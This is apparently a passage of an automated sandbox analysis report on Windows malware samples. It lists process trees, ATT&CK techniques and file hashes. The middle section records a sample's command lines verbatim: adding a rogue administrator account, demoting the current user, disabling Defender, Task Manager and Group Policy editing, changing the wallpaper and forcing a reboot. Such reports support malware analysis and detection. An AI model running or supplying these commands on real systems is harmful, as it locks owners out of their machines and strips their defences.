  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
  2⤵
  PID:3792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:1
  2⤵
  PID:5780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6140 /prefetch:8
  2⤵
  PID:5784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6896 /prefetch:8
  2⤵
  PID:5828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
  2⤵
  PID:6080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:1
  2⤵
  PID:5896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7064 /prefetch:1
  2⤵
  PID:3552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1900 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1244 /prefetch:1
  2⤵
  PID:896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7048 /prefetch:1
  2⤵
  PID:4704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
  2⤵
  PID:412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:1
  2⤵
  PID:4184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:1
  2⤵
  PID:460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7084 /prefetch:1
  2⤵
  PID:4580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6396 /prefetch:8
  2⤵
  PID:4496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6952 /prefetch:1
  2⤵
  PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1
  2⤵
  PID:516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1
  2⤵
  PID:4880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2040 /prefetch:1
  2⤵
  PID:3664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7200 /prefetch:1
  2⤵
  PID:4384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7740 /prefetch:1
  2⤵
  PID:3760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1
  2⤵
  PID:2760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8140 /prefetch:1
  2⤵
  PID:2556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6228 /prefetch:8
  2⤵
  PID:5740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7632 /prefetch:1
  2⤵
  PID:3136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3912
- C:\Users\Admin\Downloads\Lose2himatoV2.exe
  "C:\Users\Admin\Downloads\Lose2himatoV2.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  PID:5040
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net user Lose2himato /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4564
  - - C:\Windows\SysWOW64\net.exe
      net user Lose2himato /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:772
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user Lose2himato /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:540
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net user Lose2himato dumbass
    3⤵
    - System Location Discovery: System Language Discovery
    PID:768
  - - C:\Windows\SysWOW64\net.exe
      net user Lose2himato dumbass
      4⤵
      System Location Discovery: System Language Discovery
      PID:1132
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user Lose2himato dumbass
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5472
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "Lose2himato" /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3884
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administrators "Lose2himato" /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:1328
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "Lose2himato" /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5488
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete
    3⤵
    - Indicator Removal: Network Share Connection Removal
    - System Location Discovery: System Language Discovery
    PID:4340
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administrators "Admin" /delete
      4⤵
      System Location Discovery: System Language Discovery
      PID:5804
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "Admin" /delete
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:800
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5028
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3088
- - C:\Windows\SysWOW64\explorer.exe
    "explorer.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:2768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1872
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3428
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5396
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3052
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2544
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5384
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5428
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1556
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2336
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to
      4⤵
      PID:4600
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0x98,0x124,0x7ff963ee46f8,0x7ff963ee4708,0x7ff963ee4718
        5⤵
        
        PID:3308
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start https://discord.gg/UkEYppsAck
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5068
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/UkEYppsAck
      4⤵
      PID:5880
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff963ee46f8,0x7ff963ee4708,0x7ff963ee4718
        5⤵
        
        PID:6024
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start https://www.paypal.com/paypalme/himato666
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2248
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/paypalme/himato666
      4⤵
      PID:4332
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x9c,0x11c,0x120,0xf8,0x124,0x7ff963ee46f8,0x7ff963ee4708,0x7ff963ee4718
        5⤵
        
        PID:1348
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c shutdown /r
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4576
  - - C:\Windows\SysWOW64\shutdown.exe
      shutdown /r
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7976 /prefetch:1
  2⤵
  PID:1908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
  2⤵
  PID:2444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1
  2⤵
  PID:4824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7436 /prefetch:1
  2⤵
  PID:456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1
  2⤵
  PID:4968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7104 /prefetch:1
  2⤵
  PID:4624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
  2⤵
  PID:2712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
  2⤵
  PID:3960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9132 /prefetch:8
  2⤵
  PID:864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9008 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1484
- C:\Users\Admin\Downloads\Password Manager_.exe
  "C:\Users\Admin\Downloads\Password Manager_.exe"
  2⤵
  - Executes dropped EXE
  PID:3588
- - C:\Users\Admin\Downloads\Password Manager_.exe
    "C:\Users\Admin\Downloads\Password Manager_.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Sets desktop wallpaper using registry
    PID:3804
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://form.jotform.com/243393493782064
      4⤵
      PID:432
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ff963ee46f8,0x7ff963ee4708,0x7ff963ee4718
        5⤵
        
        PID:6112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16096571476565030247,13098234805350553099,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:1
  2⤵
  PID:5584

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3428

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2812

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x518 0x42c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:212

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3848855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

Indicator Removal

T1070

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
99afa4934d1e3c56bbce114b356e8a99

SHA1
3f0e7a1a28d9d9c06b6663df5d83a65c84d52581

SHA256
08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8

SHA512
76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
443a627d539ca4eab732bad0cbe7332b

SHA1
86b18b906a1acd2a22f4b2c78ac3564c394a9569

SHA256
1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9

SHA512
923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

Download Submit
